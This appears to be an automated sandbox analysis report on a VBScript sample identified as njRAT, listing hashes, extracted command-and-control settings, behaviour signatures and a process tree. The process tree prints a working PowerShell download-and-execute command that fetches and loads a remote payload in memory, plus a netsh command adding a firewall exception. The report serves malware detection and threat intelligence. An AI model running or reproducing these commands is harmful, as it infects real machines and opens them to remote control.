Analysis
-
max time kernel
299s -
max time network
308s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-es -
resource tags
arch:x64arch:x86image:win10v2004-20220812-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
05-12-2022 17:37
Static task
static1
Behavioral task
behavioral1
Sample
a.vbs
Resource
win7-20221111-es
General
-
Target
a.vbs
-
Size
226KB
-
MD5
9792c84f24e1492cc4d179523fdfcb9d
-
SHA1
f53e9afdd5ba3302186b6be1ac446c9f081c362f
-
SHA256
03b0e67b65740307c5f7109587ff3218aa803c0998a23f83f8790fd9a1e0fb47
-
SHA512
83c42a63b51dfa007012ef6f0b8e2c5e8df31610d2af391f62e7921ce5bc5bdc7eff31f255d8ab96a58563ecb20f0051f61e9482b97ce97ee60e0cfbd0d1518e
-
SSDEEP
3072:eXFJliLfuE8ozlADw8auustFmbicHkwOt4MYI2x75nehsqgB3F23st+Zn3F/MvVF:sliLfudcHV
Malware Config
Extracted
http://4.204.233.44/Dll/Dll.ppam
Extracted
njrat
im523
1 DIC
prueba30novok.duckdns.org:8002
5a6bb4a00c1be0a58dddea6ebb918e6f
-
reg_key
5a6bb4a00c1be0a58dddea6ebb918e6f
-
splitter
|'|'|
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 2 3524 powershell.exe 7 3524 powershell.exe 9 3524 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3524 set thread context of 1320 3524 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 3524 powershell.exe 3524 powershell.exe 4984 powershell.exe 4984 powershell.exe 3524 powershell.exe 3524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 3524 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeDebugPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe Token: SeIncBasePriorityPrivilege 1320 RegAsm.exe Token: 33 1320 RegAsm.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.exepowershell.exeRegAsm.exedescription pid process target process PID 3708 wrote to memory of 3524 3708 WScript.exe powershell.exe PID 3708 wrote to memory of 3524 3708 WScript.exe powershell.exe PID 3524 wrote to memory of 4984 3524 powershell.exe powershell.exe PID 3524 wrote to memory of 4984 3524 powershell.exe powershell.exe PID 3524 wrote to memory of 4972 3524 powershell.exe RegAsm.exe PID 3524 wrote to memory of 4972 3524 powershell.exe RegAsm.exe PID 3524 wrote to memory of 4972 3524 powershell.exe RegAsm.exe PID 3524 wrote to memory of 1320 3524 powershell.exe RegAsm.exe PID 3524 wrote to memory of 1320 3524 powershell.exe RegAsm.exe PID 3524 wrote to memory of 1320 3524 powershell.exe RegAsm.exe PID 3524 wrote to memory of 1320 3524 powershell.exe RegAsm.exe PID 3524 wrote to memory of 1320 3524 powershell.exe RegAsm.exe PID 3524 wrote to memory of 1320 3524 powershell.exe RegAsm.exe PID 3524 wrote to memory of 1320 3524 powershell.exe RegAsm.exe PID 3524 wrote to memory of 1320 3524 powershell.exe RegAsm.exe PID 1320 wrote to memory of 3060 1320 RegAsm.exe netsh.exe PID 1320 wrote to memory of 3060 1320 RegAsm.exe netsh.exe PID 1320 wrote to memory of 3060 1320 RegAsm.exe netsh.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $roWg = [system.Convert]::FromBase64string((New-object Net.WebClient).DownloadString('http://4.204.233.44/Dll/Dll.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.2008edod2/9278076503521797401/6154437779443457401/stnemhcatta/moc.ppadrocsid.ndc//:sptth'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" "RegAsm.exe" ENABLE4⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD510f09aff3a64f6c2bc0ad68b78da6fd7
SHA19389cd1e2407c6e6115228b590030ebff7326218
SHA256d2bebf93ce80d631191b070bc934bfa2f380aebc4d5f04655cf9932b9bff27a8
SHA5122d2a43fa44dd7c9a8f70d65aadfa12a0abe3be07ed99955fdb3656934ea6100737114d1656b6410e6cc61e441fed3eba35249900a52978c1b5282bd48b561c3b
-
memory/1320-150-0x00000000055E0000-0x00000000055EA000-memory.dmpFilesize
40KB
-
memory/1320-149-0x0000000005D20000-0x0000000005E22000-memory.dmpFilesize
1.0MB
-
memory/1320-148-0x00000000051D0000-0x0000000005262000-memory.dmpFilesize
584KB
-
memory/1320-146-0x0000000005660000-0x0000000005C04000-memory.dmpFilesize
5.6MB
-
memory/1320-145-0x0000000005010000-0x00000000050AC000-memory.dmpFilesize
624KB
-
memory/1320-140-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1320-141-0x000000000040ABBE-mapping.dmp
-
memory/3060-147-0x0000000000000000-mapping.dmp
-
memory/3524-136-0x00000298460A0000-0x00000298461A2000-memory.dmpFilesize
1.0MB
-
memory/3524-144-0x00007FF8E59B0000-0x00007FF8E6471000-memory.dmpFilesize
10.8MB
-
memory/3524-137-0x00007FF8E59B0000-0x00007FF8E6471000-memory.dmpFilesize
10.8MB
-
memory/3524-132-0x0000000000000000-mapping.dmp
-
memory/3524-135-0x000002982B660000-0x000002982B670000-memory.dmpFilesize
64KB
-
memory/3524-134-0x000002982B680000-0x000002982B6A2000-memory.dmpFilesize
136KB
-
memory/3524-133-0x0000029845E00000-0x0000029845E82000-memory.dmpFilesize
520KB
-
memory/4984-139-0x00007FF8E59B0000-0x00007FF8E6471000-memory.dmpFilesize
10.8MB
-
memory/4984-138-0x0000000000000000-mapping.dmp